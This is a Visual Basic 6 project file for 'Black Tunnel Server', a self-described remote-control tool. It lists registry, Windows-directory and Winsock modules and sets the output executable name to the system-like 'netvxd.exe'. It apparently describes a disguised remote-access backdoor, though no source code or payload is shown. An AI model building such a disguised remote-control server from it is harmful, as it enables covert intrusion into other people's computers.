Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation
Reference=*\G{420B2830-E718-11CF-893D-00A0C9054228}#1.0#0#..\..\..\..\..\..\WINDOWS\system32\scrrun.dll#Microsoft Scripting Runtime
Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; mswinsck.ocx
Form=frmMain.frm
Module=modParameters; modParameters.bas
Module=modDeclarations; modDeclarations.bas
Module=modRegistry; modRegistry.bas
Module=modWinDir; modWinDir.bas
Form=frmClient.frm
Form=frmSvr.frm
Module=modCompName; modCompName.bas
IconForm="frmMain"
Startup="frmMain"
HelpFile=""
Title="BRC"
ExeName32="netvxd.exe"
Path32="..\..\.."
Command32=""
Name="BlackTunnel"
HelpContextID="0"
Description="Black Tunnel Server v1.0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionComments="The author of Black Tunnel, LotStyl, is not responsible of any damage to computers , things or people."
VersionCompanyName="BOmBeR S.p.A."
VersionLegalCopyright="Copyright LotStyl 2005"
VersionProductName="Black Tunnel v1.0 Remote Control"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1

[MS Transaction Server]
AutoRefresh=1
